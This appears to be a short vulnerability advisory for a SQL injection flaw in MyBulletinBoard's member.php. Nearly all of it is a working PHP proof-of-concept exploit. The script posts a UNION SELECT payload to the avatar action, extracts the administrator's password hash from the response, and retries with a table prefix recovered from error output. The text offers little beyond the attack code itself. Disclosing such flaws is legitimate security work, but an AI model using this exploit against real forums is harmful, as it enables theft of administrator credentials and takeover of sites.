|
MyBulletinBoard MEMBER.PHP SQL Injection Vulnerability
An exploit is not required. The following proof of concept is reported to disclose the administrator password hash to a remote attacker: <?php // the example below will attack http://www.example.com/mybb/ echo 'Pass:' . get_pass('www.example.com', '/mybb', ''); function get_pass($host, $path, $dbprefix) { $query[] = 'uid=' . urlencode ("1' UNION SELECT 10000, 200, password AS type FROM {$dbprefix}users WHERE uid=1 ORDER BY uid DESC/*"); $query = implode('&', $query); $header = "POST $path/member.php?action=avatar HTTP/1.1\r\n"; $header .= "Host: $host\r\n"; $header .= "Content-Type: application/x-www-form-urlencoded\r\n"; $header .= "Content-Length: " . strlen($query) . "\r\n\r\n"; $fp = fsockopen($host, 80, $errno, $errstr, 30); fwrite($fp, $header . $query); $allah = ''; while (!feof($fp)) { $tmp = fgets($fp, 1024); $allah .= $tmp; } fclose($fp); preg_match('/\: ([a-z0-9]{32})/i', $allah, $matches); if (empty($matches[1]) && empty($dbprefix)) { preg_match('#FROM (\w+)avatars WHERE#i', $allah, $matches); $dbprefix = $matches[1]; if (empty($dbprefix)) { return 'Unable to obtain password'; } $password = get_pass($host, $path, $dbprefix); } else { $password = $matches[1]; } return $password; } ?> |
|
 Privacy Statement |
